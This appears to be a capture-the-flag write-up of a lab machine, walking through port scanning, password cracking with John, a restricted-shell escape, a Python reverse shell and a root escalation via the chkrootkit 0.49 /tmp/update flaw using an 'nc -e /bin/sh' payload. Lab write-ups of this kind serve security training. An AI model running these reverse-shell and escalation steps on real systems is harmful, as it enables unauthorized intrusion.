sudo nmap -p- -sS -sV 130 
22/tcp open ssh OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
80/tcp open http Apache httpd 2.4.38
Service Info: Host:; OS: Linux; CPE: cpe:/o:linux:linux_kernel

First up checking the root page for port 80 takes us to an index page containing a file called

Upon downloading the file we are asked for a password to open. Kali comes pre-installed with a John module called zip2john. We can use this to create a hash of the file which can be used for cracking with John.

└─$ zip2john > hash
ver 2.0 efh 5455 efh 7875 PKZIP Encr: 2b chk, TS_chk, cmplen=668, decmplen=1807, crc=B3ACDAFE
ver 2.0 efh 5455 efh 7875 PKZIP Encr: 2b chk, TS_chk, cmplen=434, decmplen=1111, crc=E11EC139
ver 2.0 efh 5455 efh 7875 PKZIP Encr: 2b chk, TS_chk, cmplen=460, decmplen=829, crc=A1F81C08
ver 2.0 efh 5455 efh 7875 PKZIP Encr: 2b chk, TS_chk, cmplen=368, decmplen=669, crc=FF05389F
ver 2.0 efh 5455 efh 7875 PKZIP Encr: 2b chk, TS_chk, cmplen=140, decmplen=185, crc=DFB905CD
ver 1.0 efh 5455 efh 7875 PKZIP Encr: 2b chk, TS_chk, cmplen=45, decmplen=33, crc=D9C379A9
NOTE: It is assumed that all files in each archive have the same password.
If that is not the case, the hash may be uncrackable. To avoid this, use
option -o to pick a file at a time.

└─$ ls

We can then run John against the hash.

└─$ john hash --wordlist=/usr/share/wordlists/rockyou.txt

Using default input encoding: UTF-8
Loaded 1 password hash (PKZIP [32/64])
Will run 2 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
manuel (
1g 0:00:00:00 DONE (2021-09-09 05:12) 50.00g/s 204800p/s 204800c/s 204800C/s 123456..oooooo
Use the "--show" option to display all of the cracked passwords reliably
Session completed


We can then extract the contents of After doing so we extract the /etc/ folder.

Out of these files shadow is of interest the most.

We have passwords hash for the root account and the account ‘296640a3b825115a47b68fc44501c828’. I was unable to crack the root password with a wordlist so instead was able to crack the other account after  unshadow it

└─$ john unshadowed.txt --wordlist=/usr/share/wordlists/rockyou.txt

Using default input encoding: UTF-8
Loaded 2 password hashes with 2 different salts (sha512crypt, crypt(3) $6$ [SHA512 128/128 SSE2 2x])
Cost 1 (iteration count) is 5000 for all loaded hashes
Will run 2 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
0g 0:00:00:12 0.02% (ETA: 19:25:07) 0g/s 340.4p/s 680.9c/s 680.9C/s newzealand..blue13
0g 0:00:00:20 0.04% (ETA: 19:14:39) 0g/s 343.0p/s 686.0c/s 686.0C/s bethan..bagpuss
server (296640a3b825115a47b68fc44501c828)
1g 0:00:03:08 0.63% (ETA: 13:41:37) 0.005317g/s 576.4p/s 667.0c/s 667.0C/s 222520..192522
1g 0:00:03:10 0.64% (ETA: 13:40:28) 0.005257g/s 577.3p/s 666.8c/s 666.8C/s sh3lby..sabong
Use the "--show" option to display all of the cracked passwords reliably
Session aborted
We now have the password: server I was then able to login to SSH with the username and password.
└─$ ssh 296640a3b825115a47b68fc44501c828@ -t "bash --noprofile"

296640a3b825115a47b68fc44501c828@'s password: server
bash: dircolors: command not found
296640a3b825115a47b68fc44501c828@60832e9f188106ec5bcc4eb7709ce592:~$ id
uid=1000(296640a3b825115a47b68fc44501c828) gid=1000(296640a3b825115a47b68fc44501c828) groups=1000(296640a3b825115a47b68fc44501c828)

When attempting to run a simple command such as cat we are given the error message: -rbash: cat: command not found.

We fix the $PATH with

296640a3b825115a47b68fc44501c828@60832e9f188106ec5bcc4eb7709ce592:/home$ export PATH="/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/usr/local/games:/usr/games"
296640a3b825115a47b68fc44501c828@60832e9f188106ec5bcc4eb7709ce592:/home$ echo $PATH
296640a3b825115a47b68fc44501c828@60832e9f188106ec5bcc4eb7709ce592:/home$ cd 296640a3b825115a47b68fc44501c828/
296640a3b825115a47b68fc44501c828@60832e9f188106ec5bcc4eb7709ce592:~$ cat local.txt 

Once in we have a more usable shell. We can then run a Python reverse shell to create another shell connection this should get us more usable.

/usr/bin/python -c ‘import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((“”,80));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);import pty; pty.spawn(“/bin/sh”)’

Once in the new shell export a new path so we have use of commands easily.


After enumerating the machine for a while I was unable to find points of escalation. I then transferred over pspy64 and let it run.

chmod +x pspy64

Soon after running we get a huge amount of entries for chkrootkit-0.49.

Researching on Google shows a local privilege escalation exploit with this version and below:

Chkrootkit 0.49 – Local Privilege Escalation
Chkrootkit 0.49 – Local Privilege Escalation. CVE-2014-0476CVE-107710 . local exploit for Linux platform

Essentially this will execute a binary in /tmp/update. We can create update as a reverse shell and when executed should give us a root shell.

296640a3b825115a47b68fc44501c828@60832e9f188106ec5bcc4eb7709ce592:/tmp$ cat update
/usr/bin/nc 4444 -e /bin/sh
Make it executable:
chmod +x /tmp/update

Then open a netcat listener to the specified port and we should land a root shell.

But Only after we start ( the file is in users’s home dir, so user has all permissions there)

296640a3b825115a47b68fc44501c828@60832e9f188106ec5bcc4eb7709ce592:~$ ls -la
total 60
drwxr-xr-x 3 296640a3b825115a47b68fc44501c828 296640a3b825115a47b68fc44501c828 4096 Sep 9 06:04 .
drwxr-xr-x 3 root root 4096 Jun 27 2020 ..
lrwxrwxrwx 1 root root 9 Jul 7 2020 .bash_history -> /dev/null
-rw-r--r-- 1 296640a3b825115a47b68fc44501c828 296640a3b825115a47b68fc44501c828 220 Jun 27 2020 .bash_logout
-rw-r--r-- 1 296640a3b825115a47b68fc44501c828 296640a3b825115a47b68fc44501c828 3583 Jun 27 2020 .bashrc
-rwxr-xr-x 1 root root 17480 Jul 7 2020 honeypot.decoy
-rw------- 1 root root 1855 Jul 7 2020 honeypot.decoy.cpp

296640a3b825115a47b68fc44501c828@60832e9f188106ec5bcc4eb7709ce592:~$ ./honeypot.decoy 

Welcome to the Honey Pot administration manager (HPAM). Please select an option.
1 Date.
2 Calendar.
3 Shutdown.
4 Reboot.
5 Launch an AV Scan.
6 Check /etc/passwd.
7 Leave a note.
8 Check all services status.

Option selected:5

The AV Scan will be launched in a minute or less.


└─$ sudo nc -nlvp 4444 
listening on [any] 4444 ...
connect to [] from (UNKNOWN) [] 35942
uid=0(root) gid=0(root) groups=0(root)
ls -la
total 36
drwx------ 3 root root 4096 Sep 9 05:07 .
drwxr-xr-x 18 root root 4096 Jul 12 2020 ..
lrwxrwxrwx 1 root root 9 Jul 7 2020 .bash_history -> /dev/null
-rw-r--r-- 1 root root 570 Jan 31 2010 .bashrc
drwxr-xr-x 2 296640a3b825115a47b68fc44501c828 296640a3b825115a47b68fc44501c828 4096 Jul 30 2009 chkrootkit-0.49
-rw-r--r-- 1 root root 148 Aug 17 2015 .profile
-rw-r--r-- 1 root root 33 Sep 9 05:08 proof.txt
-rw-r--r-- 1 root root 32 Aug 27 2020 root.txt
-rw-r--r-- 1 root root 137 Jul 7 2020
-rw-r--r-- 1 root root 66 Jul 7 2020 .selected_editor
cat proof.txt
if test -f "$FILE"; then
    echo "An AV scan will not be launched."

cat root
# DO NOT EDIT THIS FILE - edit the master and reinstall.
# (/tmp/crontab.V4fwaR/crontab installed on Tue Jul 7 16:44:59 2020)
# (Cron version -- $Id: crontab.c,v 2.13 1994/01/17 03:20:37 vixie Exp $)
# Edit this file to introduce tasks to be run by cron.
# For example, you can run a backup of all your user accounts
# at 5 a.m every week with:
# 0 5 * * 1 tar -zcf /var/backups/home.tgz /home/
# For more information see the manual pages of crontab(5) and cron(8)
# m h dom mon dow command
* * * * * /bin/bash /root/
Posted on

Leave a Reply

Your email address will not be published. Required fields are marked *